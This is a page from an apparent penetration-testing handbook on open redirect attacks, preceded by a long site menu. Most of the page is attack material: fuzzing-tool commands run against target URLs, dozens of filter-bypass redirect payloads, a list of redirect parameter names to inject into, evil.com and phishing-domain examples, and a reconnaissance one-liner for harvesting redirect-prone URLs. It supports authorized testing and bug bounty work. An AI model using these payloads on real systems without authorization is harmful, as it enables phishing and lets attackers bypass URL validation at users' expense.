Pentest-Book
  • Pentest-Book
  • Recon
    • Public info gathering
    • Root domains
    • Subdomain Enum
      • Subdomain Takeover
    • Webs recon
    • Network Scanning
    • Host Scanning
    • Packet Scanning
  • Enumeration
    • Pentesting Web checklist
      • Cheat sheet
    • Pentesting Web Checklist V2
    • Web Attacks
      • General Info
      • Quick tricks
      • Bruteforcing / Cracking
      • Crawl / Fuzz
      • Header injections
      • LFI / RFI
      • Open redirects
      • SSRF
      • SQLi
      • File upload
      • XSS
        • CSP
      • XXE
      • CORS
      • CSRF
      • Command Injection
      • HTTP Request Smuggling
      • Web Cache Poisoning
      • Clickjacking
      • Web Sockets
      • CRLF
      • IDOR
      • Session fixation
      • Email attacks
      • HTTP Parameter pollution
      • SSTI
      • Deserialization
      • Prototype Pollution
      • JWT attacks
      • Webshells
      • Broken Links
      • Cookie Padding
      • Information Disclosure
    • Web Technologies
      • Wordpress
      • Joomla
      • Drupal
      • Tomcat
      • APIs
      • GraphQL API
      • JS
      • ASP.NET
      • GitHub / GitLab
      • WAFs
      • Firebird
      • WebDav
      • Jenkins
      • IIS
      • VHosts
      • Firebase
      • OWA
      • OAuth
      • Flask
      • Symfony && Twig
      • NoSQL (MongoDB, CouchDB)
      • PHP
      • RoR (Ruby on Rails)
      • JBoss - Java Deserialization
      • OneLogin - SAML Login
      • Flash SWF
      • Nginx
      • Python
      • Adobe AEM
      • Magento
      • SAP
      • MFA
      • GWT
      • Jira
      • OIDC (Open ID Connect)
      • ELK
      • Sharepoint
      • Others
    • Cloud
      • General
      • Cloud Info Gathering
      • AWS
      • Azure
      • GCP
      • Docker && Kubernetes
      • CDN - Comain Fronting
    • Files
    • SSL/TLS
    • Ports
  • Exploitation
    • Payloads
    • Reverse Shells
    • File transfer
  • Post Exploitation
    • Linux
    • Pivoting
    • Windows
      • AD
        • Kerberos
      • PS tips & tricks
  • Mobile
    • General
    • Android
    • iOS
  • Others
    • Burp Suite
    • Password cracking
    • VirtualBox
    • Code review
    • Internal Pentest
    • Web fuzzers review
    • Recon suites review
    • Subdomain tools review
    • Random
    • Master assessment mindmaps
    • Bug Bounty
    • Exploiting
    • Tools everywhere
  • EXTERNAL PENTEST PLAYBOOK
    • Attack Strategy
    • Information Gathering OSINT
    • Attacking Login Portals
    • Common Pentest Findings
  • Courses
    • Practical Ethical Hacking
      • Information Gathering
    • Open-Source Intelligence (OSINT)
      • Sock Puppets
      • Email OSINT
      • Password OSINT
      • Image OSINT
      • Username OSINT
      • People OSINT
      • Social Media OSINT
      • Website OSINT
      • Business OSINT
      • Wireless OSINT
      • Working with OSINT Tools
      • OSINT Automation Foundations
      • OSINT Flowcharts
      • Search Engine OSINT
    • OSCP
      • Command Line Fun
      • Practical Tools
      • Bash Scripting
    • Certified Bug Bounty Hunter CBBH
    • Certified Penetration Testing Specialist CPTS
      • Penetration Testing Process
      • Getting Started
      • Network Enumeration with Nmap
      • Footprinting
      • File Transfers
      • Shells & Payloads
  • Internal Pentest
    • Internal Pentest CheatSheet
Powered by GitBook
On this page
  • Tools
  • Payloads
  1. Enumeration
  2. Web Attacks

Open redirects

Tools

#https://github.com/devanshbatham/OpenRedireX
python3 openredirex.py -u "https://website.com/?url=FUZZ" -p payloads.txt --keyword FUZZ

#https://github.com/0xNanda/Oralyzer
python3 oralyzer.py -u https://website.com/redir?url=

# Payload generator
# https://gist.github.com/zPrototype/b211ae91e2b082420c350c28b6674170

Payloads

# Search in Burp:
302 or "=http" or "=aHR0"(base64 encode http)
# https://github.com/m0chan/BugBounty/blob/master/OpenRedirectFuzzing.txt

https://web.com/r/?url=https://phising-malicious.com
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect

# Check redirects
https://url.com/redirect/?url=http://twitter.com/
http://www.theirsite.com@yoursite.com/
http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com
/http://twitter.com/
/\\twitter.com
/\/twitter.com
?c=.twitter.com/
/?redir=google。com
//google%E3%80%82com
//google%00.com
/%09/google.com
/%5cgoogle.com
//www.google.com/%2f%2e%2e
//www.google.com/%2e%2e
//google.com/
//google.com/%2f..
//\google.com
/\victim.com:80%40google.com
https://target.com///google.com//
# Remember url enconde the payloads!

# Fuzzing openredirect

# Intruder url open redirect
/%00/{payload}
/%07/{payload}
/%09/{payload}
/%0D/{payload}
/%0a/{payload}
/%20/{payload}
/%2F/{payload}
/%5C{payload}
//%2F/{payload}
////{payload}
///{payload}
//{payload}
/\/{payload}
/\{payload}
/cgi-bin/redirect.cgi?{payload}
/login?to={payload}
/out/{payload}
/out?{payload}
/redirect/{payload}
/{payload}
@{payload}
Redirect={payload}
RedirectUrl={payload}
ReturnUrl={payload}
Url={payload}
\%20\{payload}
\/\/{payload}
\/\{payload}
\/{payload}
\\{payload}
action={payload}
action_url={payload}
allinurl:{payload}
backUrl={payload}
backurl={payload}
burl={payload}
callback_url={payload}
cancelUrl={payload}
checkout_url={payload}
click?u={payload}
clickurl={payload}
continue={payload}
data={payload}
dest={payload}
destination={payload}
desturl={payload}
ext={payload}
follow={payload}
forward={payload}
forward_url={payload}
go={payload}
goTo={payload}
goback={payload}
goto={payload}
history={payload}
image_url={payload}
j?url={payload}
jump={payload}
jump_url={payload}
link={payload}
linkAddress={payload}
location={payload}
locationUrl={payload}
login={payload}
logout={payload}
next={payload}
origin={payload}
originUrl={payload}
page={payload}
pic={payload}
q={payload}
qurl={payload}
rUrl={payload}
r_url,={payload}
r_url={payload}
recurl={payload}
redir={payload}
redirUrl={payload}
redirect={payload}
redirectTo={payload}
redirectUrl={payload}
redirect_uri={payload}
redirect_url={payload}
ref={payload}
referrer=={payload}
referrer={payload}
request={payload}
return={payload}
returnTo={payload}
returnUri={payload}
returnUrl={payload}
return_path={payload}
return_to={payload}
return_uri={payload}
return_url={payload}
rit_url={payload}
rurl={payload}
service={payload}
sp_url={payload}
src={payload}
success={payload}
successUrl={payload}
target={payload}
tc?src={payload}
u1={payload}
u={payload}
uri={payload}
url=//{payload}
url={payload}
view={payload}

# Valid URLs:
http(s)://evil.com
http(s):\\evil.com
//evil.com
///evil.com
/\evil.com
\/evil.com
/\/evil.com
\\evil.com
\/\evil.com
/ /evil.com
\ \evil.com

# Oneliner with gf
echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew
PreviousLFI / RFINextSSRF

Last updated 1 year ago